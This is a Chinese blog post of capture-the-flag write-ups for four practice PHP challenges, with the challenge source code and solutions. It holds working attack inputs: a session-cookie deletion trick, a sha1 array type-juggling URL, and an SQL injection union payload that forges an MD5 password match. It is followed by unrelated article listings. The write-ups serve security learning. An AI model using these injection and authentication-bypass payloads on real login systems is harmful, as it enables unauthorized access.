guess next session源码:

<?php

session_start();

if (isset ($_GET['password'])) {

    if ($_GET['password'] == $_SESSION['password'])

        die ('Flag: '.$flag);

    else

        print '<p>Wrong guess.</p>';

}

mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));

?>

要求password=session时,输出flag,所以设置session值为0,提交password为0时可以成功

bp抓包出了问题,

右键删除PHPSESSID,空白密码提交,就出来了:

 FALSE:

<?php

if (isset($_GET['name']) and isset($_GET['password'])) {

    if ($_GET['name'] == $_GET['password'])

        echo '<p>Your password can not be your name!</p>';

    else if (sha1($_GET['name']) === sha1($_GET['password']))

      die('Flag: '.$flag);

    else

        echo '<p>Invalid password.</p>';

}

else{

    echo '<p>Login first!</p>';

?>

name!=password,但sha1后name=password时,可以成功

补充:sha1漏洞

md5 和 sha1 无法处理数组,返回 NULL

if (@sha1([]) ==  false)

    echo 1;

if (@md5([]) ==  false)

    echo 2;

echo var_dump(@sha1([]));

md5和sha1无法处理数组,所以可以设置为数组,得sha1值都为Null,于是构造:

http://ctf5.shiyanbar.com/web/false.php?name[]=1&password[]=2

注意,name!=password,取值要不同

 NSCTF web200

打开图片就是把给出的字符串逆着解码 ,于是逆着原来的编码进行解码:

 <?php

    function decode($str)

    {

        $_='';

        $a=base64_decode(strrev(str_rot13($str)));

        for($i=0;$i<strlen($a);$i++)

        {

            $_c=substr($a,$i,1);

            $__=ord($_c)-1;

            $_c=chr($__);

            $_=$_.$_c;

        }

        return strrev($_);

    }

    print decode("a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws");//解码得flag

?>

得到flag:

 程序逻辑问题:

看一下源码:

<html>

<head>

welcome to simplexue

</head>

<body>

<?php

if($_POST[user] && $_POST[pass]) {

    $conn = mysql_connect("********, "*****", "********");

    mysql_select_db("phpformysql") or die("Could not select database");

    if ($conn->connect_error) {

        die("Connection failed: " . mysql_error($conn));

}

$user = $_POST[user];//输入的用户名

$pass = md5($_POST[pass]);//输入密码的md5密文

$sql = "select pw from php where user='$user'";//从php表中检索用户登陆时输入的用户名的密码(pw列)

$query = mysql_query($sql);//执行sql变量的SQL语句

if (!$query) {

    printf("Error: %s\n", mysql_error($conn));

    exit();

}

$row = mysql_fetch_array($query, MYSQL_ASSOC);//声明row变量是把sql变量的SQL语句执行后返回的结果转换为数组

//echo $row["pw"];

  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {

    echo "<p>Logged in! Key:************** </p>";//如果row变量中pw的内容和用户登陆时输入的密码的MD5密码相同,则输出“Logged in!”并输出key

}

else {

    echo("<p>Log in failure!</p>");

  }

}

?>

<form method=post action=index.php>

<input type=text name=user value="Username">

<input type=password name=pass value="Password">

<input type=submit>

</form>

</body>

<a href="index.txt">

</html>

通过上述对代码的分析,因此,我们只需要让输入的密码的MD5密文和数据库检索出来的密码匹配就可以绕过验证,得到key

于是注入:

xxx' and 0=1 union select "C4CA4238A0B923820DCC509A6F75849B" # 密码输入1

输出flag:

【实验吧】guess next session&&FALSE&&NSCTF web200&&程序逻辑问题的更多相关文章

  1. 【Azure 应用服务】NodeJS Express + MSAL 实现API应用Token认证(AAD OAuth2 idToken)的认证实验 -- passport.authenticate('oauth-bearer', {session: false})

    问题描述 在前两篇博文中,对NodeJS Express应用 使用MSAL + AAD实现用户登录并获取用户信息,获取Authorization信息 ( ID Token, Access Token) ...

  2. 实验十五 GUI编程练习与应用程序部署

    实验十五  GUI编程练习与应用程序部署 实验时间 2018-12-6 一:理论部分 1.Java 程序的打包:编译完成后,程序员将.class 文件压缩打包为 .jar 文件后,GUI 界面序就可以 ...

  3. ???Struts2框架03 session的使用、登录逻辑【session工作原理】

    1 登录逻辑 1.1 获取登录数据(例如:用户名.密码) 1.2 在控制层调用业务层来验证数据信息 1.3 登录成功:保存用户信息(服务器用session.浏览器用cookie),跳转到主页面 1.4 ...

  4. 理解session及微信小程序使用session

    session介绍 由于Http是无状态的协议,所以服务端需要记录用户的状态时,就需要某种机制来识别具体的用户,实现这个机制的方式就是session. 典型的场景比如购物车,当你点击下单按钮时,由于H ...

  5. 实验吧——NSCTF web200

    题目地址:http://ctf5.shiyanbar.com/web/web200.jpg 打开就是个自定义加密函数,只要写出相应的解密算法就行 <?php function encode($s ...

  6. 实验吧_Guess Next Session&Once More(代码审计)

    Guess Next Session 看题目提示,是一道代码审计: <?php session_start(); if (isset ($_GET['password'])) { if ($_G ...

  7. NSCTF web200

    Topic Link http://ctf5.shiyanbar.com/web/web200.jpg 1) 分析代码可知a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQ ...

  8. 实验吧-web-Guess Next Session(session简介)

    看代码: <?php session_start(); if (isset ($_GET['password'])) { if ($_GET['password'] == $_SESSION[' ...

  9. 实验吧—Web——WP之 FALSE

    打开链接,点击源码按钮,我们开始分析源码: 在这源码中我们能看出 如果名字等于密码就输出:你的名字不能等于密码 如果名字的哈希值等于密码的哈希值,那么就会输出flag 这就意味着我们要上传两个值,值不 ...

随机推荐

  1. LOJ6212(博弈论)

    n <= L 和 n <= 2L 情况显然,一次就能取完: 分析 n > 2L 时: Alice手速太快,Bob同学是弱势群体,所以Bob肯定不能单纯地模仿Alice,那样顶多是平手 ...

  2. myBati初学

    创建数据库(y2165) MyBatis环境搭建1.在pom.xml引入依赖2.得替换build节点,为了让程序编译在main中所有子包下的配置文件3.构建大配置,位于resources<?xm ...

  3. vagrant教程

    http://blog.smdcn.net/article/1308.html http://ninghao.net/blog/1566 如何定制一个自己的 vagrant box: https:// ...

  4. Log4j日志框架小记

    人啊,总是在学习中发现不足,不足中学习,学习中成长. 今天来系统记录一下对于常用日志组件的理解.配置.使用. 仅供参考, 错误之处请各路好汉不吝笔墨批评指正. 转载请注明出处 Log4j日志框架是Ap ...

  5. I/O————缓存流

    为什么要使用缓存流? 当对磁盘访问次数多的时候,字节流和字符流就会感觉性能不佳,速度较慢. 缓存流,一次会读取很多的数据到缓存中,以后每一次读取都是从缓存中读取,直到缓存中数据读取完,这样就减少了io ...

  6. let和const注意点

    let 一.块级作用域 下面的代码如果使用var,最后输出的是10. var a = []; for (var i = 0; i < 10; i++) { a[i] = function () ...

  7. webpack入门之最简单的例子 webpack4

    webpack在目前来说应该是前端用的比较多的打包工具了,那么对于之前没有接触过这块的该怎么办呢?答案很明显嘛,看资料,查文档,自己去琢磨,自己去敲一敲,跑一跑: 那么,这边我将以一个最基础的例子来将 ...

  8. 读懂《HTML5网页开发实例详解》这本书

    你还在用Flash嘛?帮主早不用了 乔布斯生前在公开信<Flash之我见>中预言:像HTML 5这样在移动时代中创立的新标准,将会在移动设备上获得胜利. ——国际巨头Google.苹果等都 ...

  9. VirtualKD + Windbg 调试Win10虚拟机

    安装完vminstall后,先在运行中输入"msconfig"命令,显示如下窗口. 首先点击“引导”选项卡,然后选择最后一个引导项(Disable Signature Enforc ...

  10. POJ 2152 Fire (树形DP,经典)

    题意:给定一棵n个节点的树,要在某些点上建设消防站,使得所有点都能够通过某个消防站解决消防问题,但是每个点的建站费用不同,能够保证该点安全的消防站的距离上限也不同.给定每个点的建站费用以及最远的消防站 ...